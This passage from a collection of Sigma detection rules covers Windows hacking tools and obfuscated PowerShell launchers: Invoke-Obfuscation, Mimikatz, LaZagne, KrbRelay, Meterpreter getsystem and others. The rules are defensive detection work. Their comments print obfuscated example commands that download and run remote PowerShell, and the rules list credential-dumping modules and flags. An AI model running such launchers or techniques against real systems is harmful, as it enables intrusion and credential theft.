    "content": "title: Invoke-Obfuscation STDIN+ Launcher\nid: 6c96fc76-0eb1-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects Obfuscated use of stdin to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 25)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2024-04-15\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Example 1: c:\\windows\\sYstEm32\\CmD.eXE /C\"echO\\Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -NoEXiT -\"\n        # Example 2: c:\\WiNDOws\\sysTEm32\\cmd.EXe /C \" ECHo Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -nol ${EXEcUtIONCONTeXT}.INvOkEComMANd.InvOKEScRIPt( $InpUt )\"\n        CommandLine|re: 'cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\\"'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml",
    "content": "title: Invoke-Obfuscation VAR+ Launcher\nid: 27aec9c9-dbb0-4939-8422-1742242471d0\nstatus: test\ndescription: Detects Obfuscated use of Environment Variables to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 24)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2024-04-15\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Example 1: C:\\winDoWs\\SySTeM32\\cmd.Exe /C\"SET NOtI=Invoke-Expression (New-Object Net.WebClient).DownloadString&& PowERshElL -NOl SET-iteM ( 'VAR' + 'i'+ 'A' + 'blE:Ao6' + 'I0') ( [TYpe](\\\"{2}{3}{0}{1}\\\"-F 'iRoN','mENT','e','nv') ) ; ${exECUtIONCOnTEXT}.\\\"IN`VO`KecOmMaND\\\".\\\"inVo`KES`crIPt\\\"( ( ( GEt-VAriAble ( 'a' + 'o6I0') -vaLU )::(\\\"{1}{4}{2}{3}{0}\\\" -f'e','gETenvIR','NtvaRIa','BL','ONme' ).Invoke(( \\\"{0}{1}\\\"-f'n','oti' ),( \\\"{0}{1}\\\" -f'pRoC','esS') )) )\"\n        # Example 2: cMD.exe /C \"seT SlDb=Invoke-Expression (New-Object Net.WebClient).DownloadString&& pOWErShell .(( ^&(\\\"{1}{0}{2}{3}\\\" -f 'eT-vaR','G','iab','lE' ) (\\\"{0}{1}\\\" -f '*m','DR*' ) ).\\\"na`ME\\\"[3,11,2]-JOIN'' ) ( ( ^&(\\\"{0}{1}\\\" -f'g','CI' ) (\\\"{0}{1}\\\" -f 'ENV',':SlDb' ) ).\\\"VA`luE\\\" ) \"\n        CommandLine|re: 'cmd.{0,5}(?:/c|/r)(?:\\s|)\\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\\"'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml",
    "content": "title: Invoke-Obfuscation COMPRESS OBFUSCATION\nid: 7eedcc9d-9fdb-4d94-9c54-474e8affc0c7\nstatus: test\ndescription: Detects Obfuscated Powershell via COMPRESS OBFUSCATION\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-12-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'new-object'\n            - 'text.encoding]::ascii'\n        CommandLine|contains:\n            - 'system.io.compression.deflatestream'\n            - 'system.io.streamreader'\n            - 'readtoend('\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml",
    "content": "title: Invoke-Obfuscation Via Stdin\nid: 9c14c9fa-1a63-4a64-8e57-d19280559490\nstatus: test\ndescription: Detects Obfuscated Powershell via Stdin in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-12\nmodified: 2024-04-16\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|re: '(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml",
    "content": "title: Invoke-Obfuscation Via Use Clip\nid: e1561947-b4e3-4a74-9bdd-83baed21bdb5\nstatus: test\ndescription: Detects Obfuscated Powershell via use Clip.exe in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2024-04-15\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Example 1: C:\\WINdoWS\\sySteM32\\CMd /c \" ECho\\Invoke-Expression (New-Object Net.WebClient).DownloadString|Clip.Exe&&C:\\WINdoWS\\sySteM32\\CMd /c pOWerSheLl -STa . ( \\\"{2}{0}{1}\\\"-f'dd-',(\\\"{0}{1}\\\" -f 'T','ype' ),'A' ) -Assembly ( \\\"{4}{1}{3}{0}{2}\\\"-f (\\\"{0}{1}\\\" -f 'nd','ow'),( \\\"{1}{0}\\\"-f'.W','stem' ),( \\\"{2}{1}{0}\\\" -f 'rms','Fo','s.'),'i','Sy') ; ${exeCUtIOnCONTeXT}.\\\"INV`oKECOM`m`ANd\\\".\\\"INV`ok`ESCriPT\\\"( ( [sYSteM.wiNDoWS.forMs.ClIPboaRD]::( \\\"{2}{0}{1}\\\" -f'Ex','t',(\\\"{0}{1}\\\" -f'Get','t' ) ).\\\"iNvo`Ke\\\"( )) ) ; [System.Windows.Forms.Clipboard]::(\\\"{1}{0}\\\" -f 'ar','Cle' ).\\\"in`V`oKE\\\"( )\"\n        # Example 2: C:\\WINDowS\\sYsTEM32\\CmD.eXE /C\" echo\\Invoke-Expression (New-Object Net.WebClient).DownloadString| C:\\WIndOWs\\SYSteM32\\CLip &&C:\\WINDowS\\sYsTEM32\\CmD.eXE /C POWERSHeLL -sT -noL [Void][System.Reflection.Assembly]::( \\\"{0}{3}{4}{1}{2}\\\" -f( \\\"{0}{1}\\\"-f'Lo','adW' ),( \\\"{0}{1}\\\"-f 'Par','t'),( \\\"{0}{1}{2}\\\"-f 'ial','N','ame'),'it','h' ).\\\"in`VO`KE\\\"( ( \\\"{3}{1}{4}{5}{2}{0}\\\"-f'rms','ystem.Windo','Fo','S','w','s.' )) ; ( [wIndows.fOrms.cLIPBOArD]::( \\\"{1}{0}\\\"-f'T',( \\\"{1}{0}\\\" -f'tEX','gET' )).\\\"i`Nvoke\\\"( ) ) ^^^| ^^^& ( ( ^^^& ( \\\"{2}{1}{0}\\\"-f 'e',( \\\"{2}{1}{0}\\\"-f'IABl','aR','v' ),( \\\"{0}{1}\\\"-f'Get','-' ) ) ( \\\"{1}{0}\\\"-f'*','*MDr' )).\\\"n`Ame\\\"[3,11,2]-jOin'') ; [Windows.Forms.Clipboard]::( \\\"{0}{1}\\\" -f (\\\"{1}{0}\\\"-f'tT','Se' ),'ext').\\\"in`VoKe\\\"(' ' )\"\n        CommandLine|re: '(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml",
    "content": "title: Invoke-Obfuscation Via Use MSHTA\nid: ac20ae82-8758-4f38-958e-b44a3140ca88\nstatus: test\ndescription: Detects Obfuscated Powershell via use MSHTA in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009   # (Task31)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-08\nmodified: 2022-03-08\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'set'\n            - '&&'\n            - 'mshta'\n            - 'vbscript:createobject'\n            - '.run'\n            - '(window.close)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml",
    "content": "title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION\nid: e9f55347-2928-4c06-88e5-1a7f8169942e\nstatus: test\ndescription: Detects Obfuscated Powershell via VAR++ LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-13\nmodified: 2022-11-16\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # CommandLine|re: '(?i)&&set.*(\\{\\d\\}){2,}\\\\\\\"\\s+?\\-f.*&&.*cmd.*\\/c' # FPs with |\\/r\n        # Example 1: CMD /C\"sET KUR=Invoke-Expression (New-Object Net.WebClient).DownloadString&&Set MxI=C:\\wINDowS\\sYsWow64\\winDOWspoWERSheLl\\V1.0\\PowerShelL.EXe ${ExEcut`IoN`cON`TExT}.\\\"invo`kEcoMm`A`ND\\\".( \\\"{2}{1}{0}\\\" -f 'pt','EscRi','INvOk' ).Invoke( ( .( \\\"{0}{1}\\\" -f'D','IR' ) ( \\\"{0}{1}\\\"-f'ENV:kU','R')).\\\"vAl`Ue\\\" )&& CMD /C%mXI%\"\n        # Example 2: c:\\WiNDOWS\\sYSTEm32\\CmD.exE /C \"sEt DeJLz=Invoke-Expression (New-Object Net.WebClient).DownloadString&&set yBKM=PoWERShelL -noeX ^^^&(\\\"{2}{0}{1}\\\"-f '-ItE','m','seT') ( 'V' + 'a'+ 'RiAblE:z8J' +'U2' + 'l' ) ([TYpE]( \\\"{2}{3}{0}{1}\\\"-f 'e','NT','e','NViRONM' ) ) ; ^^^& ( ( [sTrIng]${VE`Rbo`SepReFER`Ence})[1,3] + 'X'-joIN'')( ( (.('gI') ('V' + 'a' + 'RIAbLe:z8j' + 'u2' +'l' ) ).vALUe::( \\\"{2}{5}{0}{1}{6}{4}{3}\\\" -f 'IRo','Nm','GETE','ABlE','I','nv','enTVAr').Invoke(( \\\"{0}{1}\\\"-f'd','ejLz' ),( \\\"{1}{2}{0}\\\"-f'cEss','P','RO') )) )&& c:\\WiNDOWS\\sYSTEm32\\CmD.exE /C %ybkm%\"\n        CommandLine|contains|all:\n            - '&&set'\n            - 'cmd'\n            - '/c'\n            - '-f'\n        CommandLine|contains:\n            - '{0}'\n            - '{1}'\n            - '{2}'\n            - '{3}'\n            - '{4}'\n            - '{5}'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml",
    "content": "title: HackTool - Jlaive In-Memory Assembly Execution\nid: 0a99eb3e-1617-41bd-b095-13dc767f3def\nstatus: test\ndescription: Detects the use of Jlaive to execute assemblies in a copied PowerShell\nreferences:\n    - https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool\n    - https://web.archive.org/web/20220514073704/https://github.com/ch2sh/Jlaive\nauthor: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)\ndate: 2022-05-24\nmodified: 2023-02-22\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    parent_selection:\n        ParentImage|endswith: '\\cmd.exe'\n        ParentCommandLine|endswith: '.bat'\n    selection1:\n        Image|endswith: '\\xcopy.exe'\n        CommandLine|contains|all:\n            - 'powershell.exe'\n            - '.bat.exe'\n    selection2:\n        Image|endswith: '\\xcopy.exe'\n        CommandLine|contains|all:\n            - 'pwsh.exe'\n            - '.bat.exe'\n    selection3:\n        Image|endswith: '\\attrib.exe'\n        CommandLine|contains|all:\n            - '+s'\n            - '+h'\n            - '.bat.exe'\n    condition: parent_selection and (1 of selection*)\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_koadic.yml",
    "content": "title: HackTool - Koadic Execution\nid: 5cddf373-ef00-4112-ad72-960ac29bac34\nstatus: test\ndescription: Detects command line parameters used by Koadic hack tool\nreferences:\n    - https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/\n    - https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js\n    - https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/\nauthor: wagga, Jonhnathan Ribeiro, oscd.community\ndate: 2020-01-12\nmodified: 2023-02-11\ntags:\n    - attack.execution\n    - attack.t1059.003\n    - attack.t1059.005\n    - attack.t1059.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/q'\n            - '/c'\n            - 'chcp'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_krbrelay.yml",
    "content": "title: HackTool - KrbRelay Execution\nid: e96253b8-6b3b-4f90-9e59-3b24b99cf9b4\nstatus: test\ndescription: Detects the use of KrbRelay, a Kerberos relaying tool\nreferences:\n    - https://github.com/cube0x0/KrbRelay\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-27\nmodified: 2023-02-04\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\KrbRelay.exe'\n        - OriginalFileName: 'KrbRelay.exe' # In case the file has been renamed after compilation\n    selection_cli_1:\n        CommandLine|contains|all:\n            - ' -spn '\n            - ' -clsid '\n            - ' -rbcd '\n    selection_cli_2:\n        CommandLine|contains|all:\n            - 'shadowcred'\n            - 'clsid'\n            - 'spn'\n    selection_cli_3:\n        CommandLine|contains|all:\n            - 'spn '\n            - 'session '\n            - 'clsid '\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_krbrelay_remote.yml",
    "content": "title: HackTool - RemoteKrbRelay Execution\nid: a7664b14-75fb-4a50-a223-cb9bc0afbacf\nstatus: test\ndescription: |\n    Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.\nreferences:\n    - https://github.com/CICADA8-Research/RemoteKrbRelay\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-06-27\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\RemoteKrbRelay.exe'\n        - OriginalFileName: 'RemoteKrbRelay.exe'\n    selection_cli_required:\n        CommandLine|contains|all:\n            - ' -clsid '\n            - ' -target '\n            - ' -victim '\n    # selection_cli_attacks:\n    #     # Note: In the current implementation these flags do not require any other flags. Which means they can't be used on their own. They're already covered by \"selection_cli_required\"\n    #     CommandLine|contains:\n    #         - '-adcs ' # relay to HTTP Web Enrollment and get certificate\n    #         - '-laps ' # relay to LDAP and extract LAPS passwords\n    #         - '-ldapwhoami ' # relay to LDAP and get info about relayed user\n    #         - '-shadowcred ' # relay to LDAP and setup Shadow Credentials\n    selection_cli_attack_smb:\n        CommandLine|contains|all:\n            - '-smb ' # relay to SMB\n            - '--smbkeyword '\n        CommandLine|contains:\n            - 'interactive'\n            - 'secrets'\n            - 'service-add'\n    selection_cli_attack_rbcd_main:\n        CommandLine|contains: '-rbcd ' # relay to LDAP and setup RBCD\n    selection_cli_attack_rbcd_options:\n        CommandLine|contains:\n            - '-cn ' # Computer name that will be written to msDs-AllowedToActOnBehalfOfOtherIdentity\n            - '--computername ' # Computer name that will be written to msDs-AllowedToActOnBehalfOfOtherIdentity\n    selection_cli_attack_changepass:\n        CommandLine|contains: '-chp ' # relay to LDAP and change user password\n        CommandLine|contains|all:\n            - '-chpPass ' # new password\n            - '-chpUser ' # the name of the user whose password you want to change\n    selection_cli_attack_addgrpname:\n        CommandLine|contains|all:\n            - '-addgroupmember ' # relay to LDAP and add user to group\n            - '-group '\n            - '-groupuser '\n    condition: selection_img or selection_cli_required or all of selection_cli_attack_rbcd_* or selection_cli_attack_changepass or selection_cli_attack_addgrpname or selection_cli_attack_smb\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_krbrelayup.yml",
    "content": "title: HackTool - KrbRelayUp Execution\nid: 12827a56-61a4-476a-a9cb-f3068f191073\nstatus: test\ndescription: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced\nreferences:\n    - https://github.com/Dec0ne/KrbRelayUp\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-26\nmodified: 2023-02-04\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1558.003\n    - attack.lateral-movement\n    - attack.t1550.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\KrbRelayUp.exe'\n        - OriginalFileName: 'KrbRelayUp.exe' # In case the file has been renamed after compilation\n    selection_cli_1:\n        CommandLine|contains|all:\n            - ' relay '\n            - ' -Domain '\n            - ' -ComputerName '\n    selection_cli_2:\n        CommandLine|contains|all:\n            - ' krbscm '\n            - ' -sc '\n    selection_cli_3:\n        CommandLine|contains|all:\n            - ' spawn '\n            - ' -d '\n            - ' -cn '\n            - ' -cp '\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_lazagne.yml",
    "content": "title: HackTool - LaZagne Execution\nid: c2b86e67-b880-4eec-b045-50bc98ef4844\nstatus: experimental\ndescription: |\n    Detects the execution of LaZagne, a utility used to retrieve multiple types of passwords stored on a local computer.\n    LaZagne has been leveraged multiple times by threat actors in order to dump credentials.\nreferences:\n    - https://github.com/AlessandroZ/LaZagne/tree/master\n    - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\n    - https://cloud.google.com/blog/topics/threat-intelligence/alphv-ransomware-backup/\n    - https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/\n    - https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/raw/800c0e06571993a54e39571cf27fd474dcc5c0bc/2017/2017.11.14.Muddying_the_Water/muddying-the-water-targeted-attacks.pdf\nauthor: Nasreddine Bencherchali, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2024-06-24\nmodified: 2025-10-07\ntags:\n    - attack.credential-access\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img_metadata:\n        Image|endswith: '\\lazagne.exe'\n    selection_img_cli:\n        # Note: This selection can be prone to FP. An initial baseline is required\n        Image|contains:\n            - ':\\PerfLogs\\'\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Tmp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\$Recycle.bin'\n            - '\\AppData\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Favorites\\'\n            - '\\Links\\'\n            - '\\Music\\'\n            - '\\Photos\\'\n            - '\\Pictures\\'\n            - '\\Saved Games\\'\n            - '\\Searches\\'\n            - '\\Users\\Contacts\\'\n            - '\\Users\\Default\\'\n            - '\\Users\\Searches\\'\n            - '\\Videos\\'\n            - '\\Windows\\addins\\'\n            - '\\Windows\\Fonts\\'\n            - '\\Windows\\IME\\'\n        CommandLine|endswith:\n            - '.exe all'\n            - '.exe browsers'\n            - '.exe chats'\n            - '.exe databases'\n            - '.exe games'\n            - '.exe git'\n            - '.exe mails'\n            - '.exe maven'\n            - '.exe memory'\n            - '.exe multimedia'\n            # - '.exe php' # Might be prone to FP\n            # - '.exe svn' # Might be prone to FP\n            - '.exe sysadmin'\n            - '.exe unused'\n            - '.exe wifi'\n            - '.exe windows'\n    selection_cli_modules:\n        CommandLine|contains:\n            - ' all '\n            - ' browsers '\n            - ' chats '\n            - ' databases '\n            - ' games '\n            - ' mails '\n            - ' maven '\n            - ' memory '\n            - ' multimedia '\n            - ' php '\n            - ' svn '\n            - ' sysadmin '\n            - ' unused '\n            - ' wifi '\n    selection_cli_options:\n        CommandLine|contains:\n            - '-1Password'\n            - '-apachedirectorystudio'\n            - '-autologon'\n            - '-ChromiumBased'\n            - '-coreftp'\n            - '-credfiles'\n            - '-credman'\n            - '-cyberduck'\n            - '-dbvis'\n            - '-EyeCon'\n            - '-filezilla'\n            - '-filezillaserver'\n            - '-ftpnavigator'\n            - '-galconfusion'\n            - '-gitforwindows'\n            - '-hashdump'\n            - '-iisapppool'\n            - '-IISCentralCertP'\n            - '-kalypsomedia'\n            - '-keepass'\n            - '-keepassconfig'\n            - '-lsa_secrets'\n            - '-mavenrepositories'\n            - '-memory_dump'\n            - '-Mozilla'\n            - '-mRemoteNG'\n            - '-mscache'\n            - '-opensshforwindows'\n            - '-openvpn'\n            - '-outlook'\n            - '-pidgin'\n            - '-postgresql'\n            - '-psi-im'\n            - '-puttycm'\n            - '-pypykatz'\n            - '-Rclone'\n            - '-rdpmanager'\n            - '-robomongo'\n            - '-roguestale'\n            - '-skype'\n            - '-SQLDeveloper'\n            - '-squirrel'\n            - '-tortoise'\n            - '-turba'\n            - '-UCBrowser'\n            - '-unattended'\n            - '-vault'\n            - '-vaultfiles'\n            - '-vnc'\n            - '-winscp'\n    condition: 1 of selection_img_* or all of selection_cli_*\nfalsepositives:\n    - Some false positives are expected from tools with similar command line flags.\n# Note: Increase the level to \"high\" after an initial baseline\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_localpotato.yml",
    "content": "title: HackTool - LocalPotato Execution\nid: 6bd75993-9888-4f91-9404-e1e4e4e34b77\nstatus: test\ndescription: Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples\nreferences:\n    - https://www.localpotato.com/localpotato_html/LocalPotato.html\n    - https://github.com/decoder-it/LocalPotato\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-14\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - cve.2023-21746\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\LocalPotato.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '.exe -i C:\\'\n            - '-o Windows\\'\n    selection_hash_plain:\n        Hashes|contains:\n            - 'IMPHASH=E1742EE971D6549E8D4D81115F88F1FC'\n            - 'IMPHASH=DD82066EFBA94D7556EF582F247C8BB5'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml",
    "content": "title: Potential Meterpreter/CobaltStrike Activity\nid: 15619216-e993-4721-b590-4c520615a67d\nstatus: test\ndescription: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/\nauthor: Teymur Kheirkhabarov, Ecco, Florian Roth\ndate: 2019-10-26\nmodified: 2023-02-05\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1134.001\n    - attack.t1134.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        ParentImage|endswith: '\\services.exe'\n    selection_technique_1:\n        # Examples:\n        #   Meterpreter  getsystem technique 1: cmd.exe /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        #   CobaltStrike getsystem technique 1b (expanded env var): %COMSPEC% /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        #   CobaltStrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        CommandLine|contains|all:\n            - '/c'\n            - 'echo'\n            - '\\pipe\\'\n        CommandLine|contains:\n            - 'cmd'\n            - '%COMSPEC%'\n    selection_technique_2:\n        # meterpreter getsystem technique 2: rundll32.exe C:\\Users\\test\\AppData\\Local\\Temp\\tmexsn.dll,a /p:tmexsn\n        CommandLine|contains|all:\n            - 'rundll32'\n            - '.dll,a'\n            - '/p:'\n    filter_defender:\n        CommandLine|contains: 'MpCmdRun'\n    condition: selection_img and 1 of selection_technique_* and not 1 of filter_*\nfalsepositives:\n    - Commandlines containing components like cmd accidentally\n    - Jobs and services started with cmd\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml",
    "content": "title: HackTool - Mimikatz Execution\nid: a642964e-bead-4bed-8910-1bb4d63e3b4d\nstatus: test\ndescription: Detects well-known mimikatz command line arguments\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://tools.thehacker.recipes/mimikatz/modules\nauthor: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton\ndate: 2019-10-22\nmodified: 2023-02-21\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.005\n    - attack.t1003.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_tools_name:\n        CommandLine|contains:\n            - 'DumpCreds'\n            - 'mimikatz'\n    selection_function_names: # To cover functions from modules that are not in module_names\n        CommandLine|contains:\n            - '::aadcookie' # misc module\n            - '::detours' # misc module\n            - '::memssp' # misc module\n            - '::mflt' # misc module\n            - '::ncroutemon' # misc module\n            - '::ngcsign' # misc module\n            - '::printnightmare' # misc module\n            - '::skeleton' # misc module\n            - '::preshutdown'  # service module\n            - '::mstsc'  # ts module\n            - '::multirdp'  # ts module\n    selection_module_names:\n        CommandLine|contains:\n            - 'rpc::'\n            - 'token::'\n            - 'crypto::'\n            - 'dpapi::'\n            - 'sekurlsa::'\n            - 'kerberos::'\n            - 'lsadump::'\n            - 'privilege::'\n            - 'process::'\n            - 'vault::'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_pchunter.yml",
    "content": "title: HackTool - PCHunter Execution\nid: fca949cc-79ca-446e-8064-01aa7e52ece5\nstatus: test\ndescription: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff\nreferences:\n    - https://web.archive.org/web/20231210115125/http://www.xuetr.com/\n    - https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/\n    - https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali\ndate: 2022-10-10\nmodified: 2024-11-23\ntags:\n    - attack.execution\n    - attack.discovery\n    - attack.t1082\n    - attack.t1057\n    - attack.t1012\n    - attack.t1083\n    - attack.t1007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_image:\n        Image|endswith:\n            - '\\PCHunter64.exe'\n            - '\\PCHunter32.exe'\n    selection_pe:\n        - OriginalFileName: 'PCHunter.exe'\n        - Description: 'Epoolsoft Windows Information View Tools'\n    selection_hashes:\n        Hashes|contains:\n            - 'SHA1=5F1CBC3D99558307BC1250D084FA968521482025'\n            - 'MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7'\n            - 'SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32'\n            - 'IMPHASH=444D210CEA1FF8112F256A4997EED7FF'\n            - 'SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB'\n            - 'MD5=228DD0C2E6287547E26FFBD973A40F14'\n            - 'SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C'\n            - 'IMPHASH=0479F44DF47CFA2EF1CCC4416A538663'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml",
